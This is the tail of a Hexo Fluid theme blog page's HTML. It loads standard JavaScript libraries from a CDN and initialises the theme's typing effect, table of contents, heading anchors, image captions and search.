<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
